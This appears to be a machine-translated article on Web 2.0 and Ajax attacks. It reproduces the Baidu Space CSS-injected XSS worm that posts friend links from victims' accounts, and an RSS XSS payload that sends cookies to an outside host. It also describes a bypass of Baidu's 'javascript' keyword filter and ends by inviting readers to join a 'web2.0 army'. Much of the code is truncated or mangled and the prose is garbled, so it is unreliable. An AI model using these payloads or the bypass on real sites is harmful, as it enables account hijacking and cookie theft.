This is a glimpse of Ajax attacks, but this is only the beginning. Baidu opened the July Baidu space, although no indication is the application of web2.0 technology, but from the web2.0 symbol of beta and page template architecture, etc., you can see that it has actually applied Ajax technology. And in the space opened less than half a month, the corresponding attack mode is produced, this attack should be regarded as a worm bar. It uses the custom CSS (cascading Stylesheet, cascading style form) submitted by Baidu to filter the inserted JavaScript, allowing attackers to write malicious code for XSS (Cross site scripting) across the station. So that browsing the space of Baidu Pass users do not feel the situation of the site to join their friendship connection. The most original code specimen is as follows:
Copy Code code as follows:
#header {Height:89px;background:url ("javascript:document.body.onload = function () {//--inserts JavaScript code in the CSS style label
var req = null;
if (window. XMLHttpRequest) req = new XMLHttpRequest (); -This is known as Ajax, is its core XMLHttpRequest, and the following of course is essential to determine whether IE's statements.
else if (window. ActiveXObject) {
var msxml = new Array (' MSXML2. xmlhttp.5.0 ', ' MSXML2. xmlhttp.4.0 ', ' MSXML2. xmlhttp.3.0 ', ' MSXML2. XMLHTTP ', ' microsoft.xmlhttp ');
for (Var i=0;i try{req.overridemimetype (' Text/xml ')}catch (e) {}
}
Req.open (' Get ', '. ', false);
Req.send ();
var S=req.responsetext;
P=s.indexof (' passport.baidu.com/?logout ');
if (p>0)
{
P=s.indexof (");
if (p>0)
{
P=s.indexof ('/', p);
P2=s.indexof (String.fromCharCode), p);
var user=s.substring (P+1,P2);
var name= ' Here's a bad site ';
var link= ' target URL ';
var desc= ' This link is added by an XSS script ';
var url= '/' +user+ '/commit ';
var data= ' ct=6&cm=1&spref= ' +escape (' http://hi.baidu.com/' +user) + '%2fmodify%2fbuddylink%2f0& Spbuddyname= ' +escape (name) + ' &spbuddyurl= ' +escape (link) + ' &spbuddyintro= ' +escape (DESC); -This sentence is the entire worm's execution statement, but also the AJAX data asynchronous invocation statement.
Req.open (' Post ', url,false);
Req.send (data);
Alert (' A friend Link has been added to your spaces at http://hi.baidu.com/' +user);
}
}
Else{alert (' You are not a logged Baidu user. ')}//--because it is a specimen statement, there is a judgment on whether to log in, but of course there is no actual attack.
}");
}
At that time, Baidu in the first period of the worm to reflect-filtering the submission of JavaScript in the form, of course, this also makes normal users can no longer be posted in the blog Flash animation. But later variants made the situation worse because it was found that Baidu was simply filtering out strings such as "javascript" and "expression" in CSS text. In other words, if the "JavaScript" is divided into two lines to write, you can bypass Baidu's filtering but also by IE execution. And then the mutation of the worm is also generated, the result is the user's CSS add the following code:
#header {...
Quite simply, this almost elevated the worm to a viral nature, because the user itself could not get to the CSS modification page to fix his CSS code. In fact, until the writing of this article, Baidu Space has not been a number of alternative ways to insert malicious code to effectively filter and blockade.
If we think that their effects are localized, then I have to take a look at some of the most web2.0--rss (Really Simple Syndication) attacks that have a wider impact. This is what I learned from Zdnet.com's Joris Evers, "Blog feeds may carry security risk". The general meaning is that because almost all online and offline RSS readers do not effectively filter the scripts mixed in RSS, the attacker can write malicious JavaScript code to the RSS, which eventually results in XSS Crossing, obtaining user information or other. Including the famous Bloglines, RSS reader, RSS Owl, Feed Demon, Sharp Reader are within attack range. This is the last Yahoo RSS XSS code:
Javascript:%20document.location= ' http://www.target.com/cookie.cgi? ' %20+document cookies;
Should Steal Your cookies.
Tue, Sep 23:55:18 EDT
Javascript:%20alert (Document.cookie);
Should Steal Your cookies.
Tue, Sep 23:55:18 EDT
In fact The first web2.0 attack appeared at MySpace last year, when someone wrote a JavaScript worm code on MySpace dating sites, using AJAX methods to get countless users to add him to the buddy list without their knowledge, and then automatically added " The word "Samy is my hero". This worm is called the world's first "web2.0 worm". And from the above to email, CSS, RSS attacks on the description you can also see that the current attack on the use of web2.0 is also multifaceted. But not just across the station, there is a "Hacking Ajax" article on the web, with one sentence being added in bold, "by corrupting one of the dozens's data exchanges Ajax handles while loading A Web page, a hacker can take over control of the PC, which means that it is also possible to exploit Ajax attacks and gain administrative authority on the PC as appropriate.
Because the current system to the release of the patch is always updated, it is difficult to get the shell through the overflow, unless it is a 0day system vulnerability, and SQL injection in the network has been raging for several years, there are effective methods of prevention; and because of the rise of Python and Ruby languages, New web2.0 services are emerging and have replaced existing Web architecture trends, such as Plone. But what is immutable is the Web browser's interpretation of XHTML and JavaScript, and as long as we always have the possibility to change JavaScript, we will always have the possibility to elevate our own privileges ...
Are you interested in a piece of the growing web2.0 army?